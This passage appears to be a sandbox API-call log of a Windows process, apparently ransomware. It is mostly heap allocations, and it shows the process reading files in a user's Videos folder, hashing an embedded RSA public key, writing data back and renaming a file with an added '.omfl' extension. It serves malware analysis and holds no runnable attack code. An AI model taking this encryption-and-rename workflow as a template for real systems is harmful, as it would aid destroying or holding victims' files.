(HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171f0 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171a8 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd167e8 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.693] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0131.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171a8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35088 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.695] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.696] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x61b7, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x61b7, lpOverlapped=0x0) returned 1 [0131.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.696] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x61bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.696] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.696] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.697] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.697] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.697] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.697] CloseHandle (hObject=0x610) returned 1 [0131.702] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.702] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x74fb288 [0131.702] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.702] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\57EjRRjIEtfdBsuYYWaq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\57ejrrjietfdbsuyywaq.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\57EjRRjIEtfdBsuYYWaq.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\57ejrrjietfdbsuyywaq.swf.omfl")) returned 1 [0131.703] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.703] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.703] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.704] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.704] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba9f500, ftCreationTime.dwHighDateTime=0x1d5d8ff, ftLastAccessTime.dwLowDateTime=0xae82cdb0, ftLastAccessTime.dwHighDateTime=0x1d5df85, ftLastWriteTime.dwLowDateTime=0xae82cdb0, ftLastWriteTime.dwHighDateTime=0x1d5df85, nFileSizeHigh=0x0, nFileSizeLow=0x9c0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8m_9p0IgJbfO.flv", cAlternateFileName="8M_9P0~1.FLV")) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.705] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.705] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.705] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8m_9p0IgJbfO.flv") returned=".flv" [0131.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8m_9p0IgJbfO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8m_9p0igjbfo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.705] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=39947) returned 1 [0131.705] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.708] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x9be5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.708] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.709] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.709] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.709] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.709] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x9c0b, lpOverlapped=0x0) returned 1 [0131.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.709] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.709] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.710] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.710] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.710] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.711] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.711] GetLastError () returned 0x0 [0131.711] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.711] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.711] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.711] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.711] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.711] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.711] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9c10) returned 0xdd35410 [0131.711] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.711] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.711] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35088 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17148 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd350d0 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171a8 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171f0 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.712] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.712] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd167e8 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd171f0 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.712] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.713] GetCurrentThreadId () returned 0x618 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2dd20 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 